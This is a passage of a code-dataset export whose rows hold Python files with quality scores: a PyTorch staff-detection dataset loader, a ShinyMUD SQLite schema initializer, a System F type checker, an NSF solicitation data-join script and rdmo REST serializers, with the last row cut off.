code stringlengths 2k 1.04M | repo_path stringlengths 5 517 | parsed_code stringlengths 0 1.04M | quality_prob float64 0.02 0.95 | learning_prob float64 0.02 0.93 |
|---|---|---|---|---|
import json
import os
import numpy as np
import torch
import torch.utils.data
from PIL import Image
class StaffDataset(torch.utils.data.Dataset):
def __init__(self, root, transforms=None):
    """Dataset of staff images with JSON box annotations.

    root: directory containing 'images/' and 'annotations/' subfolders.
    transforms: optional callable applied as transforms(img, target).
    """
    self.root = root
    self.transforms = transforms
    # load all image files, sorting them to
    # ensure that they are aligned
    self.imgs = list(sorted(os.listdir(os.path.join(root, "images"))))
    self.annotations = list(sorted(os.listdir(os.path.join(root, "annotations"))))
    # lazy cache: idx -> image_size dict, filled by __getitem__
    self.image_sizes = {}
def __getitem__(self, idx):
    """Load image `idx` and build a torchvision-detection-style target.

    Returns (img, target) with target keys: boxes, labels, image_id,
    area, iscrowd. Degenerate boxes (non-positive width/height) are
    reported and dropped.
    """
    # load images and annotations
    img_path = os.path.join(self.root, "images", self.imgs[idx])
    ann_path = os.path.join(self.root, "annotations", self.annotations[idx])
    img = Image.open(img_path).convert("RGB")
    # BUG FIX: json.load() has no 'encoding' parameter (ignored in <=3.8,
    # removed in Python 3.9 -> TypeError); pass encoding to open() instead.
    with open(ann_path, 'r', encoding='utf-8') as f:
        annot_d = json.load(f)
    annotations = annot_d['annotations']
    image_size = annot_d['image_size']
    if not self.image_sizes.get(idx):
        self.image_sizes[idx] = image_size
    num_objs = len(annotations)
    boxes = []
    for annot in annotations:
        xmin = annot['left']
        ymin = annot['top']
        xmax = xmin + annot['width']
        ymax = ymin + annot['height']
        boxes.append([xmin, ymin, xmax, ymax])
    # there is only one class
    labels = torch.ones((num_objs,), dtype=torch.int64)
    # BUG FIX: int16 overflows for coordinates > 32767 and detection models
    # expect float boxes; reshape(-1, 4) keeps the column indexing below
    # valid even when there are zero annotations.
    boxes = torch.as_tensor(boxes, dtype=torch.float32).reshape(-1, 4)
    image_id = torch.tensor([idx])
    area = (boxes[:, 3] - boxes[:, 1]) * (boxes[:, 2] - boxes[:, 0])
    # suppose all instances are not crowd
    iscrowd = torch.zeros((num_objs,), dtype=torch.int64)
    # report, then filter out, degenerate boxes
    bad_boxes = (boxes[:, 3] <= boxes[:, 1]) | (boxes[:, 2] <= boxes[:, 0])
    for bad_box in boxes[bad_boxes]:
        print(f'BAD: {bad_box} in {self.imgs[idx]}')
    keep = ~bad_boxes
    boxes = boxes[keep]
    labels = labels[keep]
    area = area[keep]
    iscrowd = iscrowd[keep]
    target = {}
    target["boxes"] = boxes
    target["labels"] = labels
    target["image_id"] = image_id
    target["area"] = area
    target["iscrowd"] = iscrowd
    if self.transforms is not None:
        img, target = self.transforms(img, target)
    return img, target
def __len__(self):
    # dataset size = number of image files discovered at init time
    return len(self.imgs)
def get_height_and_width(self, idx):
    """Return [height, width] for sample `idx`, reading the annotation
    file only on a cache miss (cache is filled by __getitem__ too)."""
    image_size = self.image_sizes.get(idx)
    if not image_size:
        ann_path = os.path.join(self.root, "annotations", self.annotations[idx])
        with open(ann_path, 'r') as f:
            # NOTE(review): json.load() no longer accepts 'encoding'
            # (removed in Python 3.9) — pass encoding to open() instead.
            image_size = json.load(f, encoding='utf-8')['image_size']
    return [image_size['height'], image_size['width']] | references/detection/staff_dataset.py | import json
import os
import numpy as np
import torch
import torch.utils.data
from PIL import Image
class StaffDataset(torch.utils.data.Dataset):
def __init__(self, root, transforms=None):
self.root = root
self.transforms = transforms
# load all image files, sorting them to
# ensure that they are aligned
self.imgs = list(sorted(os.listdir(os.path.join(root, "images"))))
self.annotations = list(sorted(os.listdir(os.path.join(root, "annotations"))))
self.image_sizes = {}
def __getitem__(self, idx):
    """Load image `idx` and build a torchvision-detection-style target.

    Returns (img, target) with target keys: boxes, labels, image_id,
    area, iscrowd. Degenerate boxes (non-positive width/height) are
    reported and dropped.
    """
    # load images and annotations
    img_path = os.path.join(self.root, "images", self.imgs[idx])
    ann_path = os.path.join(self.root, "annotations", self.annotations[idx])
    img = Image.open(img_path).convert("RGB")
    # BUG FIX: json.load() has no 'encoding' parameter (ignored in <=3.8,
    # removed in Python 3.9 -> TypeError); pass encoding to open() instead.
    with open(ann_path, 'r', encoding='utf-8') as f:
        annot_d = json.load(f)
    annotations = annot_d['annotations']
    image_size = annot_d['image_size']
    if not self.image_sizes.get(idx):
        self.image_sizes[idx] = image_size
    num_objs = len(annotations)
    boxes = []
    for annot in annotations:
        xmin = annot['left']
        ymin = annot['top']
        xmax = xmin + annot['width']
        ymax = ymin + annot['height']
        boxes.append([xmin, ymin, xmax, ymax])
    # there is only one class
    labels = torch.ones((num_objs,), dtype=torch.int64)
    # BUG FIX: int16 overflows for coordinates > 32767 and detection models
    # expect float boxes; reshape(-1, 4) keeps the column indexing below
    # valid even when there are zero annotations.
    boxes = torch.as_tensor(boxes, dtype=torch.float32).reshape(-1, 4)
    image_id = torch.tensor([idx])
    area = (boxes[:, 3] - boxes[:, 1]) * (boxes[:, 2] - boxes[:, 0])
    # suppose all instances are not crowd
    iscrowd = torch.zeros((num_objs,), dtype=torch.int64)
    # report, then filter out, degenerate boxes
    bad_boxes = (boxes[:, 3] <= boxes[:, 1]) | (boxes[:, 2] <= boxes[:, 0])
    for bad_box in boxes[bad_boxes]:
        print(f'BAD: {bad_box} in {self.imgs[idx]}')
    keep = ~bad_boxes
    boxes = boxes[keep]
    labels = labels[keep]
    area = area[keep]
    iscrowd = iscrowd[keep]
    target = {}
    target["boxes"] = boxes
    target["labels"] = labels
    target["image_id"] = image_id
    target["area"] = area
    target["iscrowd"] = iscrowd
    if self.transforms is not None:
        img, target = self.transforms(img, target)
    return img, target
def __len__(self):
return len(self.imgs)
def get_height_and_width(self, idx):
image_size = self.image_sizes.get(idx)
if not image_size:
ann_path = os.path.join(self.root, "annotations", self.annotations[idx])
with open(ann_path, 'r') as f:
image_size = json.load(f, encoding='utf-8')['image_size']
return [image_size['height'], image_size['width']] | 0.65202 | 0.305432 |
import os
from shinymud.models import __file__ as model_file
from shinymud.lib.world import World
model_path = os.path.abspath(os.path.dirname(model_file))
model_files = [f[:-3] for f in os.listdir(model_path) if f.endswith('.py') and not f.startswith(('_','.'))]
for module in model_files:
temp = __import__('shinymud.models.%s' % module, globals(), locals(), [])
from shinymud.models import model_list
EXISTING_TABLES = {}
def initialize_database():
    """Create/upgrade the SQLite schema for every registered model.

    Populates EXISTING_TABLES from sqlite_master, creates any missing
    tables, then adds columns that models define but tables lack.
    """
    world = World.get_world()
    # foreign-key enforcement is off by default in SQLite; turn it on
    world.db.conn.cursor().execute('PRAGMA foreign_keys = true')
    db_table_names = [x['name'] for x in world.db.select("name from sqlite_master where type='table'")]
    for table_name in db_table_names:
        # one-row select just to discover the table's column names
        columns = world.db.select("* from %s limit 1" % table_name)
        if columns and len(columns):
            EXISTING_TABLES[table_name] = columns[0].keys()
    for mod in model_list.values():
        if mod.db_table_name not in EXISTING_TABLES:
            create_table(mod)
    for mod in model_list.values():
        for col in mod.db_columns:
            if col.name not in EXISTING_TABLES[mod.db_table_name]:
                add_column(mod, col.name)
def create_table(model):
    """CREATE TABLE for `model`, first creating/extending the tables its
    foreign keys reference. Records the new table in EXISTING_TABLES."""
    if model.db_table_name in EXISTING_TABLES:
        return
    # check for dependencies: foreign keys into *other* tables
    # (self-references need no pre-creation)
    dependencies = [col.foreign_key for col in model.db_columns if col.foreign_key and col.foreign_key[0] != model.db_table_name]
    for mod, col in dependencies:
        M = model_list.get(mod)
        if not M:
            raise Exception('Dependency on unknown model: %s' % str(mod))
        if M.db_table_name not in EXISTING_TABLES:
            create_table(M)
        elif col not in EXISTING_TABLES[M.db_table_name]:
            add_column(M, col)
    # generate create table string
    table_string = []
    table_string.append('CREATE TABLE IF NOT EXISTS %s (' % model.db_table_name)
    columns_string = []
    for col in model.db_columns:
        columns_string.append(str(col))
    for extra in model.db_extras:
        # NOTE(review): `unicode` is Python 2 only — this module will
        # NameError on Python 3 (use str() there).
        columns_string.append(unicode(extra))
    table_string.append(','.join(columns_string))
    table_string.append(')')
    create_stmt = "".join(table_string)
    cursor = World.get_world().db.conn.cursor()
    cursor.execute(create_stmt)
    EXISTING_TABLES[model.db_table_name] = [col.name for col in model.db_columns]
def add_column(mod, col):
    """ALTER TABLE to add column named `col` to `mod`'s table, creating
    the table (which adds all columns) or FK targets first if needed."""
    # check for dependencies
    if mod.db_table_name not in EXISTING_TABLES:
        # creating the table creates every column, including `col`
        create_table(mod)
    else:
        if col in EXISTING_TABLES[mod.db_table_name]:
            return # Column already exists!?
        # find the column definition matching the requested name
        column = None
        for c in mod.db_columns:
            if c.name == col:
                column = c
                break
        if not column:
            raise Exception('Trying to create undefined column!')
        if column.foreign_key:
            # make sure the referenced table/column exists first
            m, c = column.foreign_key
            M = model_list.get(m)
            if M.db_table_name not in EXISTING_TABLES:
                create_table(M)
            elif c not in EXISTING_TABLES[M.db_table_name]:
                add_column(M, c)
        alter_stmt = 'ALTER TABLE %s ADD COLUMN %s' % (mod.db_table_name, str(column))
        cursor = World.get_world().db.conn.cursor()
        cursor.execute(alter_stmt)
        EXISTING_TABLES[mod.db_table_name].append(col) | src/shinymud/lib/setup.py | import os
from shinymud.models import __file__ as model_file
from shinymud.lib.world import World
model_path = os.path.abspath(os.path.dirname(model_file))
model_files = [f[:-3] for f in os.listdir(model_path) if f.endswith('.py') and not f.startswith(('_','.'))]
for module in model_files:
temp = __import__('shinymud.models.%s' % module, globals(), locals(), [])
from shinymud.models import model_list
EXISTING_TABLES = {}
def initialize_database():
world = World.get_world()
world.db.conn.cursor().execute('PRAGMA foreign_keys = true')
db_table_names = [x['name'] for x in world.db.select("name from sqlite_master where type='table'")]
for table_name in db_table_names:
columns = world.db.select("* from %s limit 1" % table_name)
if columns and len(columns):
EXISTING_TABLES[table_name] = columns[0].keys()
for mod in model_list.values():
if mod.db_table_name not in EXISTING_TABLES:
create_table(mod)
for mod in model_list.values():
for col in mod.db_columns:
if col.name not in EXISTING_TABLES[mod.db_table_name]:
add_column(mod, col.name)
def create_table(model):
if model.db_table_name in EXISTING_TABLES:
return
# check for dependencies
dependencies = [col.foreign_key for col in model.db_columns if col.foreign_key and col.foreign_key[0] != model.db_table_name]
for mod, col in dependencies:
M = model_list.get(mod)
if not M:
raise Exception('Dependency on unknown model: %s' % str(mod))
if M.db_table_name not in EXISTING_TABLES:
create_table(M)
elif col not in EXISTING_TABLES[M.db_table_name]:
add_column(M, col)
# generate create table string
table_string = []
table_string.append('CREATE TABLE IF NOT EXISTS %s (' % model.db_table_name)
columns_string = []
for col in model.db_columns:
columns_string.append(str(col))
for extra in model.db_extras:
columns_string.append(unicode(extra))
table_string.append(','.join(columns_string))
table_string.append(')')
create_stmt = "".join(table_string)
cursor = World.get_world().db.conn.cursor()
cursor.execute(create_stmt)
EXISTING_TABLES[model.db_table_name] = [col.name for col in model.db_columns]
def add_column(mod, col):
# check for dependencies
if mod.db_table_name not in EXISTING_TABLES:
create_table(mod)
else:
if col in EXISTING_TABLES[mod.db_table_name]:
return # Column already exists!?
column = None
for c in mod.db_columns:
if c.name == col:
column = c
break
if not column:
raise Exception('Trying to create undefined column!')
if column.foreign_key:
m, c = column.foreign_key
M = model_list.get(m)
if M.db_table_name not in EXISTING_TABLES:
create_table(M)
elif c not in EXISTING_TABLES[M.db_table_name]:
add_column(M, c)
alter_stmt = 'ALTER TABLE %s ADD COLUMN %s' % (mod.db_table_name, str(column))
cursor = World.get_world().db.conn.cursor()
cursor.execute(alter_stmt)
EXISTING_TABLES[mod.db_table_name].append(col) | 0.140985 | 0.208461 |
from typing import TypeVar
from uuid import UUID, uuid4
from magicpy.STLC import Env, ConsEnv, NilEnv
A = TypeVar("A")
def true(x: A, y: A) -> A:
return x
class Type:
def apply(self, x: 'TVal', t: 'Type') -> 'Type':
...
def gen_uuid(self) -> 'Type':
...
def apply_uuid(self, v: 'TVal') -> 'Type':
...
class TVal(Type):
    """A type variable: a display name plus an optional UUID identity.

    Equality is by uid only — two variables whose uid is still None
    compare equal regardless of name.
    """
    x: str
    uid: UUID

    def __init__(self, x, uid=None):
        self.x = x
        self.uid = uid

    def __str__(self):
        return self.x

    def __eq__(self, other):
        # identity lives in the uuid; the name is only for display
        if isinstance(other, TVal):
            return self.uid == other.uid
        return False

    def apply(self, x: 'TVal', t: 'Type') -> 'Type':
        # substitution [x := t] hits this variable only when it *is* x
        if self == x:
            return t
        return self

    def gen_uuid(self) -> 'Type':
        # a bare variable keeps whatever identity it already carries
        return self

    def apply_uuid(self, v: 'TVal') -> 'Type':
        # adopt v's uuid when the names match (binder renaming)
        if self.x == v.x:
            return TVal(self.x, v.uid)
        return self
class TForall(Type):
    # universally quantified type: forall x. e
    x: TVal
    e: Type
    def __init__(self, x, e):
        self.x = x
        self.e = e
    def __str__(self):
        return f"(∀ {self.x}. {self.e})"
    def __eq__(self, other):
        # alpha-equivalence: rewrite other's binder to ours, then
        # compare bodies structurally
        if self is other:
            return True
        elif other is not None and isinstance(other, TForall):
            return self.e == other.e.apply(other.x, self.x)
        else:
            return False
    def apply(self, x: 'TVal', t: 'Type') -> 'Type':
        # NOTE(review): the else branch returns the substituted *body*,
        # dropping the ∀ binder (compare TArr.apply, which rebuilds the
        # node) — looks like it should be TForall(self.x, self.e.apply(x, t)).
        return self if self.x == x else self.e.apply(x, t)
    def gen_uuid(self) -> 'Type':
        # give the binder a fresh uuid once, rename it through the body,
        # then keep recursing for nested binders
        if self.x.uid is None:
            v = TVal(self.x.x, uuid4())
            return TForall(v, self.e.apply_uuid(v).gen_uuid())
        return TForall(self.x, self.e.gen_uuid())
    def apply_uuid(self, v: 'TVal') -> 'Type':
        # a same-named binder shadows v; do not descend under it
        return self if self.x.x == v.x else TForall(self.x, self.e.apply_uuid(v))
class TArr(Type):
    """Function type a -> b; every operation maps structurally over
    both the domain and the codomain."""
    a: Type
    b: Type

    def __init__(self, a, b):
        self.a = a
        self.b = b

    def __str__(self):
        return f"({self.a} -> {self.b})"

    def _both(self, f) -> 'TArr':
        # rebuild the arrow with f applied to each side
        return TArr(f(self.a), f(self.b))

    def apply(self, x: 'TVal', t: 'Type') -> 'Type':
        return self._both(lambda side: side.apply(x, t))

    def gen_uuid(self) -> 'Type':
        return self._both(lambda side: side.gen_uuid())

    def apply_uuid(self, v: 'TVal') -> 'Type':
        return self._both(lambda side: side.apply_uuid(v))
class Expr:
def check_type(self, env: Env) -> Type:
...
def gen_uuid(self) -> 'Expr':
...
def apply_uuid(self, v: TVal) -> 'Expr':
...
class Val(Expr):
    """A term variable, optionally annotated with its type.

    t defaults to None (unannotated); check_type then consults the env.
    """
    x: str
    t: Type

    def __init__(self, x, t=None):
        self.x = x
        self.t = t

    def check_type(self, env: Env) -> Type:
        # annotated occurrences carry their own type; otherwise look it up
        return self.t if self.t is not None else env.lookup(self.x)

    def gen_uuid(self) -> 'Expr':
        # BUG FIX: an unannotated variable (t is None, the documented
        # default) used to crash with AttributeError on None.gen_uuid().
        return Val(self.x, self.t.gen_uuid() if self.t is not None else None)

    def apply_uuid(self, v: TVal) -> 'Expr':
        return self if self.t is not None else Val(self.x, v.gen_uuid())
class Fun(Expr):
    # term-level lambda: fun x. e, where x carries its own type annotation
    x: Val
    e: Expr
    def __init__(self, x, e):
        self.x = x
        self.e = e
    def check_type(self, env: Env) -> Type:
        # arrow from the parameter's annotated type to the body's type,
        # checked with x pushed onto the environment
        return TArr(self.x.t, self.e.check_type(ConsEnv(self.x, env)))
    def gen_uuid(self) -> 'Expr':
        return Fun(self.x.gen_uuid(), self.e.gen_uuid())
    def apply_uuid(self, v: TVal) -> 'Expr':
        return Fun(self.x.apply_uuid(v), self.e.apply_uuid(v))
class App(Expr):
    # term application: f x
    f: Expr
    x: Expr
    def __init__(self, f, x):
        self.f = f
        self.x = x
    def check_type(self, env: Env) -> Type:
        # f must have an arrow type whose domain matches x's type
        tf: Type = self.f.check_type(env)
        if isinstance(tf, TArr) and tf.a == self.x.check_type(env):
            return tf.b
        raise TypeError()
    def gen_uuid(self) -> 'Expr':
        return App(self.f.gen_uuid(), self.x.gen_uuid())
    def apply_uuid(self, v: TVal) -> 'Expr':
        return App(self.f.apply_uuid(v), self.x.apply_uuid(v))
class Forall(Expr):
    """Term-level type abstraction: forall x. e."""
    x: TVal
    e: Expr

    def __init__(self, x, e):
        self.x = x
        self.e = e

    def check_type(self, env: Env) -> Type:
        return TForall(self.x, self.e.check_type(env))

    def gen_uuid(self) -> 'Expr':
        if self.x.uid is None:
            # fresh identity for the binder, renamed through the body
            v = TVal(self.x.x, uuid4())
            return Forall(v, self.e.apply_uuid(v).gen_uuid())
        # BUG FIX: this case used to fall off the end and return None
        # (cf. TForall.gen_uuid); recurse into the body instead.
        return Forall(self.x, self.e.gen_uuid())

    def apply_uuid(self, v: TVal) -> 'Expr':
        # a same-named binder shadows v; do not descend under it
        return self if self.x.x == v.x else Forall(self.x, self.e.apply_uuid(v))
class AppT(Expr):
e: Expr
t: Type
def __init__(self, e, t):
self.e = e
self.t = t
def check_type(self, env: Env) -> Type:
te = self.e.check_type(env)
if isinstance(te, TForall):
return te.e.apply(te.x, self.t)
raise TypeError()
def gen_uuid(self) -> 'Expr':
return AppT(self.e.gen_uuid(), self.t.gen_uuid())
def apply_uuid(self, v: TVal) -> 'Expr':
return AppT(self.e.apply_uuid(v), self.t.apply_uuid(v)) | magicpy/SystemF.py | from typing import TypeVar
from uuid import UUID, uuid4
from magicpy.STLC import Env, ConsEnv, NilEnv
A = TypeVar("A")
def true(x: A, y: A) -> A:
return x
class Type:
def apply(self, x: 'TVal', t: 'Type') -> 'Type':
...
def gen_uuid(self) -> 'Type':
...
def apply_uuid(self, v: 'TVal') -> 'Type':
...
class TVal(Type):
x: str
uid: UUID
def __init__(self, x, uid=None):
self.x = x
self.uid = uid
def __str__(self):
return self.x
def __eq__(self, other):
return self.uid == other.uid if other is not None and isinstance(other, TVal) else False
def apply(self, x: 'TVal', t: 'Type') -> 'Type':
return t if self == x else self
def gen_uuid(self) -> 'Type':
return self
def apply_uuid(self, v: 'TVal') -> 'Type':
return TVal(self.x, v.uid) if self.x == v.x else self
class TForall(Type):
x: TVal
e: Type
def __init__(self, x, e):
self.x = x
self.e = e
def __str__(self):
return f"(∀ {self.x}. {self.e})"
def __eq__(self, other):
if self is other:
return True
elif other is not None and isinstance(other, TForall):
return self.e == other.e.apply(other.x, self.x)
else:
return False
def apply(self, x: 'TVal', t: 'Type') -> 'Type':
return self if self.x == x else self.e.apply(x, t)
def gen_uuid(self) -> 'Type':
if self.x.uid is None:
v = TVal(self.x.x, uuid4())
return TForall(v, self.e.apply_uuid(v).gen_uuid())
return TForall(self.x, self.e.gen_uuid())
def apply_uuid(self, v: 'TVal') -> 'Type':
return self if self.x.x == v.x else TForall(self.x, self.e.apply_uuid(v))
class TArr(Type):
a: Type
b: Type
def __init__(self, a, b):
self.a = a
self.b = b
def __str__(self):
return f"({self.a} -> {self.b})"
def apply(self, x: 'TVal', t: 'Type') -> 'Type':
return TArr(self.a.apply(x, t), self.b.apply(x, t))
def gen_uuid(self) -> 'Type':
return TArr(self.a.gen_uuid(), self.b.gen_uuid())
def apply_uuid(self, v: 'TVal') -> 'Type':
return TArr(self.a.apply_uuid(v), self.b.apply_uuid(v))
class Expr:
def check_type(self, env: Env) -> Type:
...
def gen_uuid(self) -> 'Expr':
...
def apply_uuid(self, v: TVal) -> 'Expr':
...
class Val(Expr):
x: str
t: Type
def __init__(self, x, t=None):
self.x = x
self.t = t
def check_type(self, env: Env) -> Type:
return self.t if self.t is not None else env.lookup(self.x)
def gen_uuid(self) -> 'Expr':
return Val(self.x, self.t.gen_uuid())
def apply_uuid(self, v: TVal) -> 'Expr':
return self if self.t is not None else Val(self.x, v.gen_uuid())
class Fun(Expr):
x: Val
e: Expr
def __init__(self, x, e):
self.x = x
self.e = e
def check_type(self, env: Env) -> Type:
return TArr(self.x.t, self.e.check_type(ConsEnv(self.x, env)))
def gen_uuid(self) -> 'Expr':
return Fun(self.x.gen_uuid(), self.e.gen_uuid())
def apply_uuid(self, v: TVal) -> 'Expr':
return Fun(self.x.apply_uuid(v), self.e.apply_uuid(v))
class App(Expr):
f: Expr
x: Expr
def __init__(self, f, x):
self.f = f
self.x = x
def check_type(self, env: Env) -> Type:
tf: Type = self.f.check_type(env)
if isinstance(tf, TArr) and tf.a == self.x.check_type(env):
return tf.b
raise TypeError()
def gen_uuid(self) -> 'Expr':
return App(self.f.gen_uuid(), self.x.gen_uuid())
def apply_uuid(self, v: TVal) -> 'Expr':
return App(self.f.apply_uuid(v), self.x.apply_uuid(v))
class Forall(Expr):
x: TVal
e: Expr
def __init__(self, x, e):
self.x = x
self.e = e
def check_type(self, env: Env) -> Type:
return TForall(self.x, self.e.check_type(env))
def gen_uuid(self) -> 'Expr':
if self.x.uid is None:
v = TVal(self.x.x, uuid4())
return Forall(v, self.e.apply_uuid(v).gen_uuid())
def apply_uuid(self, v: TVal) -> 'Expr':
return self if self.x.x == v.x else Forall(self.x, self.e.apply_uuid(v))
class AppT(Expr):
e: Expr
t: Type
def __init__(self, e, t):
self.e = e
self.t = t
def check_type(self, env: Env) -> Type:
te = self.e.check_type(env)
if isinstance(te, TForall):
return te.e.apply(te.x, self.t)
raise TypeError()
def gen_uuid(self) -> 'Expr':
return AppT(self.e.gen_uuid(), self.t.gen_uuid())
def apply_uuid(self, v: TVal) -> 'Expr':
return AppT(self.e.apply_uuid(v), self.t.apply_uuid(v)) | 0.835651 | 0.464841 |
import ujson
# Joins scraped NSF solicitation metadata into API-downloaded documents,
# writing one JSON object per line (2001-2016).
#
# NOTE(review): `os` is used on the next line but never imported — this
# script raises NameError as written; add `import os`.
# NOTE(review): Python 2 only (print statement, dict.iteritems).
basedir = os.path.join( os.path.dirname( __file__ ), '..' )
with open(os.path.join(basedir, "data", "solicitations","combined", "nsf_solicitations_2001-2016.json"), "w") as out:
    # track matches
    opps_in_api_data = []
    for year in range(1,16):
        # zero-pad the two-digit fiscal year
        if year < 10:
            strYear = "0"+str(year)
        else:
            strYear = str(year)
        # print strYear
        with open("data/solicitations/api/nsf20" + strYear + ".json", "r") as api:
            # NOTE(review): eval() executes arbitrary code from the file —
            # prefer ujson.loads / ast.literal_eval on this data.
            api = eval(api.read())
        with open("data/solicitations/scraped/nsf_solicitation_prog_elem_nums.json", "r") as scraped:
            scraped = scraped.readlines()
        for api_doc in api:
            # print type(api_doc)
            api_doc = api_doc[0]
            for scraped_doc in scraped:
                scraped_doc = ujson.loads(scraped_doc)
                if scraped_doc["funding_opportunity_number"] == api_doc["FundingOpportunityNumber"]:
                    opps_in_api_data.append(scraped_doc["funding_opportunity_number"])
                    # copy every scraped field except the two join keys
                    for key, value in scraped_doc.iteritems():
                        if not key == "funding_opportunity_number" and not key == "opportunity_name":
                            api_doc[key] = value
            out.write(ujson.dumps(api_doc) + "\n")
    print len(opps_in_api_data)
    # If a opportunity number that was scraped is not found in the data scraped via the API, just add in doc with what we have from scraping
    with open(os.path.join(basedir, "data", "solicitations", "scraped", "nsf_solicitation_prog_elem_nums.json"), "r") as scraped:
        scraped = scraped.readlines()
    for scraped_doc in scraped:
        scraped_doc = ujson.loads(scraped_doc)
        if not scraped_doc["funding_opportunity_number"] in opps_in_api_data:
            partial_doc = {}
            for key, value in scraped_doc.iteritems():
                if key == "funding_opportunity_number":
                    partial_doc["FundingOpportunityNumber"] = scraped_doc["funding_opportunity_number"]
                elif key == "opportunity_name":
                    partial_doc["FundingOpportunityTitle"] = scraped_doc["opportunity_name"]
                else:
                    partial_doc[key] = value
            # fields only the API provides — mark explicitly unavailable
            partial_doc["CFDANumber"] = "n/a"
            partial_doc["CompetitionID"] = "n/a"
            partial_doc["OpeningDate"] = "n/a"
            partial_doc["ClosingDate"] = "n/a"
            partial_doc["OfferingAgency"] = "n/a"
            partial_doc["AgencyContactInfo"] = "n/a"
            partial_doc["CFDADescription"] = "n/a"
            partial_doc["SchemaURL"] = "n/a"
            partial_doc["InstructionsURL"] = "n/a"
            partial_doc["IsMultiProject"] = "n/a"
            out.write(ujson.dumps(partial_doc) + "\n") | agencies/NSF/data_scripts/3.join_solication_scrape_and_api.py | import ujson
basedir = os.path.join( os.path.dirname( __file__ ), '..' )
with open(os.path.join(basedir, "data", "solicitations","combined", "nsf_solicitations_2001-2016.json"), "w") as out:
# track matches
opps_in_api_data = []
for year in range(1,16):
if year < 10:
strYear = "0"+str(year)
else:
strYear = str(year)
# print strYear
with open("data/solicitations/api/nsf20" + strYear + ".json", "r") as api:
api = eval(api.read())
with open("data/solicitations/scraped/nsf_solicitation_prog_elem_nums.json", "r") as scraped:
scraped = scraped.readlines()
for api_doc in api:
# print type(api_doc)
api_doc = api_doc[0]
for scraped_doc in scraped:
scraped_doc = ujson.loads(scraped_doc)
if scraped_doc["funding_opportunity_number"] == api_doc["FundingOpportunityNumber"]:
opps_in_api_data.append(scraped_doc["funding_opportunity_number"])
for key, value in scraped_doc.iteritems():
if not key == "funding_opportunity_number" and not key == "opportunity_name":
api_doc[key] = value
out.write(ujson.dumps(api_doc) + "\n")
print len(opps_in_api_data)
# If a opportunity number that was scraped is not found in the data scraped via the API, just add in doc with what we have from scraping
with open(os.path.join(basedir, "data", "solicitations", "scraped", "nsf_solicitation_prog_elem_nums.json"), "r") as scraped:
scraped = scraped.readlines()
for scraped_doc in scraped:
scraped_doc = ujson.loads(scraped_doc)
if not scraped_doc["funding_opportunity_number"] in opps_in_api_data:
partial_doc = {}
for key, value in scraped_doc.iteritems():
if key == "funding_opportunity_number":
partial_doc["FundingOpportunityNumber"] = scraped_doc["funding_opportunity_number"]
elif key == "opportunity_name":
partial_doc["FundingOpportunityTitle"] = scraped_doc["opportunity_name"]
else:
partial_doc[key] = value
partial_doc["CFDANumber"] = "n/a"
partial_doc["CompetitionID"] = "n/a"
partial_doc["OpeningDate"] = "n/a"
partial_doc["ClosingDate"] = "n/a"
partial_doc["OfferingAgency"] = "n/a"
partial_doc["AgencyContactInfo"] = "n/a"
partial_doc["CFDADescription"] = "n/a"
partial_doc["SchemaURL"] = "n/a"
partial_doc["InstructionsURL"] = "n/a"
partial_doc["IsMultiProject"] = "n/a"
out.write(ujson.dumps(partial_doc) + "\n") | 0.076572 | 0.169028 |
from rest_framework import serializers
from rest_framework.reverse import reverse
from rdmo.conditions.models import Condition
from rdmo.core.serializers import TranslationSerializerMixin
from rdmo.core.utils import get_language_warning
from rdmo.questions.models import QuestionSet
from ..models import Option, OptionSet
from ..validators import OptionSetUniqueKeyValidator, OptionUniquePathValidator
class QuestionSetSerializer(serializers.ModelSerializer):
class Meta:
model = QuestionSet
fields = (
'id',
'key'
)
class ConditionSerializer(serializers.ModelSerializer):
class Meta:
model = Condition
fields = (
'id',
'key'
)
class OptionSetSerializer(serializers.ModelSerializer):
    """Read/write serializer for OptionSet; the questionsets that
    reference this optionset are exposed read-only."""
    questionsets = QuestionSetSerializer(many=True, read_only=True)
    class Meta:
        model = OptionSet
        fields = (
            'id',
            'uri_prefix',
            'key',
            'comment',
            'order',
            'provider_key',
            'conditions',
            'questionsets'
        )
        # enforces key uniqueness across optionsets
        validators = (OptionSetUniqueKeyValidator(), )
class OptionSerializer(TranslationSerializerMixin, serializers.ModelSerializer):
    """Read/write serializer for Option. The parent optionset is required
    on write; attached conditions are exposed read-only. The 'text' field
    is expanded per language by TranslationSerializerMixin."""
    optionset = serializers.PrimaryKeyRelatedField(queryset=OptionSet.objects.all(), required=True)
    conditions = ConditionSerializer(many=True, read_only=True)
    class Meta:
        model = Option
        fields = (
            'id',
            'optionset',
            'uri_prefix',
            'key',
            'comment',
            'order',
            'text',
            'label',
            'additional_input',
            'conditions'
        )
        # translated fields handled by TranslationSerializerMixin
        trans_fields = (
            'text',
        )
        # enforces path uniqueness across options
        validators = (OptionUniquePathValidator(), )
class OptionSetIndexSerializer(serializers.ModelSerializer):
class Meta:
model = OptionSet
fields = (
'id',
'key',
)
class OptionIndexSerializer(serializers.ModelSerializer):
class Meta:
model = Option
fields = (
'id',
'optionset',
'key',
'text'
)
class ProviderNestedSerializer(serializers.Serializer):
key = serializers.CharField()
label = serializers.CharField()
class_name = serializers.CharField()
class Meta:
fields = (
'key',
'label',
'class_name'
)
class OptionNestedSerializer(serializers.ModelSerializer):
warning = serializers.SerializerMethodField()
xml_url = serializers.SerializerMethodField()
class Meta:
model = Option
fields = (
'id',
'uri_prefix',
'path',
'text',
'warning',
'xml_url'
)
def get_warning(self, obj):
return get_language_warning(obj, 'text')
def get_xml_url(self, obj):
return reverse('v1-options:option-detail-export', args=[obj.pk])
class OptionSetNestedSerializer(serializers.ModelSerializer):
    """Nested read serializer: an optionset with its options, provider
    info, and a per-object XML export URL."""
    options = OptionNestedSerializer(many=True)
    provider = ProviderNestedSerializer()
    xml_url = serializers.SerializerMethodField()
    class Meta:
        model = OptionSet
        fields = (
            'id',
            'uri_prefix',
            'key',
            'provider',
            'options',
            'xml_url'
        )
    def get_xml_url(self, obj):
        # export endpoint for this optionset's XML representation
        return reverse('v1-options:optionset-detail-export', args=[obj.pk])
from rest_framework.reverse import reverse
from rdmo.conditions.models import Condition
from rdmo.core.serializers import TranslationSerializerMixin
from rdmo.core.utils import get_language_warning
from rdmo.questions.models import QuestionSet
from ..models import Option, OptionSet
from ..validators import OptionSetUniqueKeyValidator, OptionUniquePathValidator
class QuestionSetSerializer(serializers.ModelSerializer):
class Meta:
model = QuestionSet
fields = (
'id',
'key'
)
class ConditionSerializer(serializers.ModelSerializer):
class Meta:
model = Condition
fields = (
'id',
'key'
)
class OptionSetSerializer(serializers.ModelSerializer):
